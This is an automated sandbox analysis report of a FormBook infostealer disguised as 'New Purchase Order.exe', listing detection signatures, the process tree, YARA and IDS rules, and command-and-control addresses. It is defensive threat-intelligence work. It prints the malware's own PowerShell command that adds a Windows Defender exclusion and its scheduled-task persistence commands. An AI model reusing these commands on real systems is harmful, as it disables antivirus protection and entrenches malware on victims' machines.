Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name:New Purchase Order.exe
Analysis ID:1507701
MD5:9ef9cffb40d3911e46cb798daa08b46f
SHA1:69bbbc4b8a61ff2fb340f6921c9d66e5f3337cfa
SHA256:a1c124aa85ef07d4c39706dcd012d208576a4b08ec24106fd28d4c5847f9afc9
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New Purchase Order.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
    • powershell.exe (PID: 2992 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7352 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7132 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New Purchase Order.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
      • kdFPsEWDpy.exe (PID: 6044 cmdline: "C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setupugc.exe (PID: 7752 cmdline: "C:\Windows\SysWOW64\setupugc.exe" MD5: 342CBB77B3F4B3F073DF2F042D20E121)
          • kdFPsEWDpy.exe (PID: 2132 cmdline: "C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7972 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • ibDqDkseW.exe (PID: 7340 cmdline: C:\Users\user\AppData\Roaming\ibDqDkseW.exe MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
    • schtasks.exe (PID: 7532 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ibDqDkseW.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Roaming\ibDqDkseW.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
    • ibDqDkseW.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Roaming\ibDqDkseW.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x34f2a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1d099:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.New Purchase Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          8.2.New Purchase Order.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e4a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          8.2.New Purchase Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            8.2.New Purchase Order.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 2992, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 2992, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibDqDkseW.exe, ParentImage: C:\Users\user\AppData\Roaming\ibDqDkseW.exe, ParentProcessId: 7340, ParentProcessName: ibDqDkseW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp", ProcessId: 7532, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", ProcessId: 7132, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 2992, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", ProcessId: 7132, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-09T04:51:33.457358+020028554651A Network Trojan was detected192.168.2.44974182.221.128.18380TCP
            2024-09-09T04:52:04.971654+020028554651A Network Trojan was detected192.168.2.449746217.160.0.12780TCP
            2024-09-09T04:52:18.546634+020028554651A Network Trojan was detected192.168.2.44975085.159.66.9380TCP
            2024-09-09T04:52:32.580881+020028554651A Network Trojan was detected192.168.2.44975454.179.173.6080TCP
            2024-09-09T04:52:46.258157+020028554651A Network Trojan was detected192.168.2.449758162.0.213.9480TCP
            2024-09-09T04:52:59.535259+020028554651A Network Trojan was detected192.168.2.4497623.33.130.19080TCP
            2024-09-09T04:53:12.697406+020028554651A Network Trojan was detected192.168.2.44976613.248.169.4880TCP
            2024-09-09T04:53:26.012494+020028554651A Network Trojan was detected192.168.2.449770185.134.245.11380TCP
            2024-09-09T04:53:39.898339+020028554651A Network Trojan was detected192.168.2.449774103.42.108.4680TCP
            2024-09-09T04:54:02.019450+020028554651A Network Trojan was detected192.168.2.44977838.55.112.7080TCP
            2024-09-09T04:54:23.800670+020028554651A Network Trojan was detected192.168.2.449782162.240.81.1880TCP
            2024-09-09T04:54:57.868388+020028554651A Network Trojan was detected192.168.2.44978654.183.209.21080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-09T04:51:57.333525+020028554641A Network Trojan was detected192.168.2.449743217.160.0.12780TCP
            2024-09-09T04:51:59.892864+020028554641A Network Trojan was detected192.168.2.449744217.160.0.12780TCP
            2024-09-09T04:52:02.552406+020028554641A Network Trojan was detected192.168.2.449745217.160.0.12780TCP
            2024-09-09T04:52:10.809816+020028554641A Network Trojan was detected192.168.2.44974785.159.66.9380TCP
            2024-09-09T04:52:13.357463+020028554641A Network Trojan was detected192.168.2.44974885.159.66.9380TCP
            2024-09-09T04:52:15.900214+020028554641A Network Trojan was detected192.168.2.44974985.159.66.9380TCP
            2024-09-09T04:52:24.881361+020028554641A Network Trojan was detected192.168.2.44975154.179.173.6080TCP
            2024-09-09T04:52:27.486647+020028554641A Network Trojan was detected192.168.2.44975254.179.173.6080TCP
            2024-09-09T04:52:30.067218+020028554641A Network Trojan was detected192.168.2.44975354.179.173.6080TCP
            2024-09-09T04:52:38.628754+020028554641A Network Trojan was detected192.168.2.449755162.0.213.9480TCP
            2024-09-09T04:52:41.191892+020028554641A Network Trojan was detected192.168.2.449756162.0.213.9480TCP
            2024-09-09T04:52:43.748193+020028554641A Network Trojan was detected192.168.2.449757162.0.213.9480TCP
            2024-09-09T04:52:51.874986+020028554641A Network Trojan was detected192.168.2.4497593.33.130.19080TCP
            2024-09-09T04:52:54.426237+020028554641A Network Trojan was detected192.168.2.4497603.33.130.19080TCP
            2024-09-09T04:52:56.973656+020028554641A Network Trojan was detected192.168.2.4497613.33.130.19080TCP
            2024-09-09T04:53:05.038781+020028554641A Network Trojan was detected192.168.2.44976313.248.169.4880TCP
            2024-09-09T04:53:07.589600+020028554641A Network Trojan was detected192.168.2.44976413.248.169.4880TCP
            2024-09-09T04:53:10.141285+020028554641A Network Trojan was detected192.168.2.44976513.248.169.4880TCP
            2024-09-09T04:53:18.391239+020028554641A Network Trojan was detected192.168.2.449767185.134.245.11380TCP
            2024-09-09T04:53:20.935573+020028554641A Network Trojan was detected192.168.2.449768185.134.245.11380TCP
            2024-09-09T04:53:23.485548+020028554641A Network Trojan was detected192.168.2.449769185.134.245.11380TCP
            2024-09-09T04:53:32.245544+020028554641A Network Trojan was detected192.168.2.449771103.42.108.4680TCP
            2024-09-09T04:53:34.811568+020028554641A Network Trojan was detected192.168.2.449772103.42.108.4680TCP
            2024-09-09T04:53:37.364123+020028554641A Network Trojan was detected192.168.2.449773103.42.108.4680TCP
            2024-09-09T04:53:54.399966+020028554641A Network Trojan was detected192.168.2.44977538.55.112.7080TCP
            2024-09-09T04:53:56.942945+020028554641A Network Trojan was detected192.168.2.44977638.55.112.7080TCP
            2024-09-09T04:53:59.488015+020028554641A Network Trojan was detected192.168.2.44977738.55.112.7080TCP
            2024-09-09T04:54:16.181262+020028554641A Network Trojan was detected192.168.2.449779162.240.81.1880TCP
            2024-09-09T04:54:18.700631+020028554641A Network Trojan was detected192.168.2.449780162.240.81.1880TCP
            2024-09-09T04:54:21.251151+020028554641A Network Trojan was detected192.168.2.449781162.240.81.1880TCP
            2024-09-09T04:54:30.364349+020028554641A Network Trojan was detected192.168.2.44978354.183.209.21080TCP
            2024-09-09T04:54:32.915872+020028554641A Network Trojan was detected192.168.2.44978454.183.209.21080TCP
            2024-09-09T04:54:35.459872+020028554641A Network Trojan was detected192.168.2.44978554.183.209.21080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeReversingLabs: Detection: 21%
            Multi AV Scanner detection for submitted file
            Source: New Purchase Order.exeVirustotal: Detection: 30%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: New Purchase Order.exeJoe Sandbox ML: detected
            Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kdFPsEWDpy.exe, 00000010.00000002.4110547247.000000000095E000.00000002.00000001.01000000.0000000D.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4110594599.000000000095E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E6C520 FindFirstFileW,FindNextFileW,FindClose,17_2_02E6C520
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then xor eax, eax17_2_02E59C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then mov ebx, 00000004h17_2_03750469

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49774 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 54.179.173.60:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 54.183.209.210:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49746 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49750 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49758 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49778 -> 38.55.112.70:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49784 -> 54.183.209.210:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 54.179.173.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 54.183.209.210:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 54.179.173.60:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49770 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 38.55.112.70:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49766 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49777 -> 38.55.112.70:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49754 -> 54.179.173.60:80
